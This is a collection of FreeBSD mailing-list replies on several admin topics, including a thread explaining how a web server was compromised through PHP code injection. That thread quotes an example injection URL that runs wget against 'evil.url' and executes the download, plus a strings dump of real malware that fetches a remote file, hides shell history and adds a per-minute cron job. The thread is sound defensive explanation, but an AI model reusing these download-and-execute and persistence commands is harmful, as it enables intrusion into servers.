Re: questions about FreeBSD
2009/8/31 James Phillips anti_spam...@yahoo.ca: ... I have some questions about FreeBSD. The questions I had in mind are: Such general questions imply homework assignment. Indeed, I found General features (at least three)? Firewall, GUI, Networking and so on. quite amusing. I am surprised he didn't include the marking scheme for us and his teacher's email address so that we could save him the bother of handing it in. Somebody already replied with a link to the Handbook: It mainly covers installing and configuring FreeBSD. If that were the only response, he probably would have just printed the handbook out and handed it in - given the amount of effort he took to hide the fact that it was a home work question. That said, he *might* actually learn something about FreeBSD, which is probably more than can be said for the rest of his class. ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Re: what www perl script is running?
Hi Colin. I thought I'd just add my tuppence here. Some time ago I suffered a similar exploit, albeit on a Linux box, with Apache and a different PHP web app (Horde if I recall correctly). There are a number of ways your server could have been comprised via a PHP webapp, and a mailling list probably isn't the best place to give you a tutorial on the likes of cross-site scripting and code injection. What I can do is tell you roughly how my site was infected via a code injection - to give you an idea of how important it is to learn more about it if you are running a webserver (espescially one with third party web apps installed). In my case, I was able to learn quite a bit about how the exploit was performed by looking in my Apache logs. Primarily because the attack exploited an HTTP GET variable, so I could actually grep the name of the script that was download from the logs. Basically all it took was for someone to construct a URL similar to the following*: http://www.myserver.com/vulnerable_script.php?unchecked_variable=some_value; exec('wget http://evil.url/virus.pl -O /tmp/virus.pl'); exec('/tmp/virus.pl'); All it needs then is a bit of code on the server side which uses the GET variable verbatum to build a line of code without checking the variable. If the above variable were used in the construction of a line of PHP, in an (extra) unsafe manner, you would end up with several lines of PHP. Clearly building code from a user supplied variable is a very bad idea, and doing so without checking the variable... - however it isn't unheard of in the world of third party web apps (it isn't unheard of in in-house web apps either, however because that are not so widespread there is less chance that the exploit will be found, and probably less to gain from exploiting it). The attack against your server was almost certainly automated and most likely not even targetted at you. If you check your error logs, you will probably see lots of 'file not found' and similar errors, testing for vulnerabilities in ASP scripts and PHP web apps which you don't have installed - in much the same way that you will have SSH login failures for users who don't exist on your system. Using an incoming and outgoing firewall is clearly a must on a dedicated web server. Running an outgoing server on your desktop is a bit more complicated as you would probably want to allow certain applications to setup outgoing connections. I don't know how you do this on a FreeBSD system. However something that no one seems to have mentioned yet is running an application level firewall to protect your web server, this is particularly important if you are running popular third party web applications. Once a flaw has been found in a popular web app, it is very easily for the malware writers to attempt to exploit this on thousands of webservers. A web application firewall, such as Mod_Security for Apache (not sure what is available for lighttpd), will check the traffic to your HTTP server for any irregularities, known exploits and potential exploits. HTH Jeremy * the URL I wrote probably isn't even valid, it is just a demonstration, so just treat it as psuedocode. 2009/8/27 Colin Brace c...@lim.nl: Colin Brace wrote: ah, another directory found in /tmp with files written by www called .bash/ Contents here: http://silenceisdefeat.com/~cbrace/www_badstuff-3.gz Apropos of the contents of the above, a correspondent writes: [...] running 'strings' on /tmp/owned will show HISTFILE=/dev/null cd /tmp;curl -s -O http://www.tirnaveni.org/tmpfile 21 /dev/null cd /tmp;wget -b http://www.tirnaveni.org/tmpfile 21 /dev/null echo '*/1 * * * * perl /tmp/tmpfile' cron.job crontab cron.job rm -rf cron.job chmod 0100 /tmp/tmpfile 21 /dev/null perl /tmp/tmpfile 21 /dev/null [...] So this would be the original mischief-maker. Just out of curiousity, can someone explain to me in basic terms how an intruder exploits a vulnerability such as apparently existed on my system (the RoundCube webmail package was apparently the culprit) to place the binary file owned in /tmp and execute it? Thanks - Colin Brace Amsterdam http://lim.nl -- View this message in context: http://www.nabble.com/what-www-perl-script-is-running--tp25112050p25167487.html Sent from the freebsd-questions mailing list archive at Nabble.com. ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Re: rsync or even scp questions....
How, may I ask, does this work? If you search the bash man file you can find this and lots of other useful constructs, search for 'Parameter Expansion' - I'm not sure how much of this relates to other Bourne Shell derivatives, but I don't imagine it would be difficult to test it out. ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to [EMAIL PROTECTED]
Re: Can an Account be Locked out for ssh but allow su?
Personally I prefer AllowUsers, as that denies all users except those specifically allowed. Deny/AllowGroups are useful too. 2008/10/8 Martin McCormick [EMAIL PROTECTED] Henrik Hudson writes: Check the sshd_config man page for AllowUsers and DenyUsers directives. Many thanks. DenyUsers did the trick. ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to [EMAIL PROTECTED] ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to [EMAIL PROTECTED]
Re: detecting monitor's sync and refresh rate?
I cheated a little and pulled this out of openSUSE 11's monitor database: #== # [EMAIL PROTECTED] #-- -- LCD:[EMAIL PROTECTED] { Option=DPMS Hsync=31-60 Modeline=1024x768 65.0 1024 1048 1184 1344 768 771 777 806 -hsync -vsync Vsync=30-60 } That should be about right for your 15 LCD monitor if it supports [EMAIL PROTECTED] - quite common for 15 monitors. You'll notice modeline matches the last modeline in your logs. It might not be optimal, but it should work if your monitor is VESA compliant. Another option, if you have the Windows driver disk, would be to extract the .inf file and get the settings from that. 2008/10/8 Anton Shterenlikht [EMAIL PROTECTED] On Tue, Oct 07, 2008 at 04:42:07PM -0400, Lowell Gilbert wrote: Anton Shterenlikht [EMAIL PROTECTED] writes: I've a monitor (Mobi M15MPC) with no docs. I've searched the net but cannot find any info on sync and refresh rate for it. I've done Xorg -configure, but testing with X -config xorg.conf.new shows screen shifted to the side and very nasty blinking, from which I deduced that perhaps I need to specify correct sync, refresh and mode. Are there any commands to get sync and refresh from the monitor? If X can't probe the monitor for its settings, I wouldn't trust any other method of probing it either. Not to overlook the obvious: are the settings written on the back of the monitor? no, nothing there. Can I make anything from this fragment of /var/log/Xorg.0.log: (II) intel(0): Printing DDC gathered Modelines: (II) intel(0): Modeline 1024x768x0.0 65.00 1024 1048 1184 1184 768 771 777 806 -hsync -vsync (54.9 kHz) (II) intel(0): Modeline 800x600x0.0 40.00 800 840 968 1056 600 601 605 628 +hsync +vsync (37.9 kHz) (II) intel(0): Modeline 640x480x0.0 25.20 640 656 752 800 480 490 492 525 -hsync -vsync (31.5 kHz) (II) intel(0): Modeline 720x400x0.0 28.32 720 738 846 900 400 412 414 449 -hsync +vsync (31.5 kHz) (II) intel(0): Modeline 1024x768x0.0 65.00 1024 1048 1184 1344 768 771 777 806 -hsync -vsync (48.4 kHz) You can always try Google... so far no luck thanks anton -- Anton Shterenlikht Room 2.6, Queen's Building Mech Eng Dept Bristol University University Walk, Bristol BS8 1TR, UK Tel: +44 (0)117 928 8233 Fax: +44 (0)117 929 4423 ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to [EMAIL PROTECTED] ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to [EMAIL PROTECTED]
Re: thorny (for me) permissions problem
4. however, after upload, the file has the ownership A:B (i.e, owned by A, group B) with permissions -rw-r--r--. So B does not have permission to delete the file. -rw-r--r-- 1 user_a user_b 154879 Oct 7 08:40 data_file.csv Hi John. Correct me if I am wrong but permission to delete a file depends on the users permissions for the containing directory. If B has write permission on the directory then B can delete the file. However you will likely need to use 'rm -f'. Regards. Jeremy. On Tue, Oct 7, 2008 at 1:54 PM, John Almberg [EMAIL PROTECTED] wrote: The following permissions problem has me stumped: 1. User A uploads a file (using ftp) to the server, into a directory called 'data' owned by user B. Permissions on directory set to allow this, like this: drwxrwxr-x 2 user_b user_b 512 Oct 7 08:40 data 2. A cron job, run by user B, then processes the file 3. When the processing is complete, the cron job needs to delete the file from the server 4. however, after upload, the file has the ownership A:B (i.e, owned by A, group B) with permissions -rw-r--r--. So B does not have permission to delete the file. -rw-r--r-- 1 user_a user_b 154879 Oct 7 08:40 data_file.csv The ftp user can manually change the permissions on the file to -rw-rw-r--, but I do not want to depend on the user remembering to change permissions. If he forgets, the cronjob will process the file over and over again. I need the server to handle this, so it gets done correctly 100% of the time. B does not have sufficient permissions to delete the file or change it's permissions. The only thing I can think of is to have ANOTHER cron job, run by A, run every few minutes to check for the existence of a file, and change the permissions so B can delete it. But this smells like a kludge to me. Is there a correct way to handle this? For instance, is there something I can set in A's profile, so when he uploads a file, the group permission is set to rw? That would be a nice clean way to do it, but I can't find anything like that. Any help, much appreciated. -- John ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to [EMAIL PROTECTED] ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to [EMAIL PROTECTED]